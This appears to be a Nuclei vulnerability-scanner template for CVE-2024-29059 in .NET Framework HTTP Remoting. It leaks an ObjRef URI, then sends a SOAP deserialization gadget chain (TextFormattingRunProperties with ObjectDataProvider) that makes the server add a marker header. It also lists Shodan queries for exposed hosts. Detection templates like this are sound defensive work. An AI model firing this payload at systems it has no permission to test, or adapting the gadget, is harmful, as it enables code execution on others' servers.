.NET Framework - Leaking ObjRefs via HTTP .NET Remoting

id: CVE-2024-29059

info:
  name: .NET Framework - Leaking ObjRefs via HTTP .NET Remoting
  author: iamnoooob,rootxharsh,DhiyaneshDk,pdresearch
  severity: high
  description: .NET Framework Information Disclosure Vulnerability
  reference:
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29059
    - https://code-white.com/blog/leaking-objrefs-to-exploit-http-dotnet-remoting/
    - https://github.com/codewhitesec/HttpRemotingObjRefLeak
    - https://github.com/NaInSec/CVE-LIST
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-29059
    cwe-id: CWE-209
    epss-score: 0.01259
    epss-percentile: 0.85581
    cpe: cpe:2.3:a:microsoft:.net_framework:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: microsoft
    product: .net_framework
    shodan-query:
      - 'Server: MS .NET Remoting'
      - "server: ms .net remoting"
  tags: cve,cve2024,dotnet,microsoft,remoting,deserialization

http:
  - raw:
      - |
        GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.1
        Host: {{Hostname}}
        __RequestVerb: POST
        Content-Type: text/xml

      - |
        POST {{objref}} HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: ""
        Content-Type: text/xml

        <SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <a1:TextFormattingRunProperties id="ref-1" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/Microsoft.VisualStudio.Text.Formatting/Microsoft.PowerShell.Editor%2C%20Version%3D3.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35">
        <ForegroundBrush id="ref-3">&#60;ObjectDataProvider MethodName=&#34;AddHeader&#34;
          xmlns=&#34;http://schemas.microsoft.com/winfx/2006/xaml/presentation&#34;
          xmlns:x=&#34;http://schemas.microsoft.com/winfx/2006/xaml&#34;
          xmlns:System=&#34;clr-namespace:System;assembly=mscorlib&#34;
          xmlns:System.Web=&#34;clr-namespace:System.Web;assembly=System.Web&#34;&#62;&#60;ObjectDataProvider.ObjectInstance&#62;&#60;ObjectDataProvider MethodName=&#34;get_Response&#34;&#62;&#60;ObjectDataProvider.ObjectInstance&#62;
          &#60;ObjectDataProvider ObjectType=&#34;{x:Type System.Web:HttpContext}&#34; MethodName=&#34;get_Current&#34; /&#62;
          &#60;/ObjectDataProvider.ObjectInstance&#62;
          &#60;/ObjectDataProvider&#62;
          &#60;/ObjectDataProvider.ObjectInstance&#62;
          &#60;ObjectDataProvider.MethodParameters&#62;
          &#60;System:String&#62;X-Vuln-Test&#60;/System:String&#62;
          &#60;System:String&#62;{{randstr}}&#60;/System:String&#62;
          &#60;/ObjectDataProvider.MethodParameters&#62;
        &#60;/ObjectDataProvider&#62;</ForegroundBrush>
        </a1:TextFormattingRunProperties>
        </SOAP-ENV:Envelope>

    extractors:
      - type: regex
        name: objref
        part: body_1
        group: 1
        regex:
          - "(/[0-9a-f_]+/[0-9A-Za-z_+]+_[0-9]+\\.rem)"
        internal: true

      - type: dsl
        dsl:
          - x_vuln_test

    matchers:
      - type: dsl
        dsl:
          - "contains(body_1,'ObjRef')"
          - "contains(x_vuln_test,'{{randstr}}')"
        condition: and
# digest: 4a0a004730450220345063f60a2d0c6207c121752f7cb77e3dcbed7838778fba2d50401c0157e8b3022100c4030d56682e9556b292d09469ecf21d4119b2f3b7dd00ad8d5ee7c70a1c1f00:922c64590222798bb761d5b6d8e72950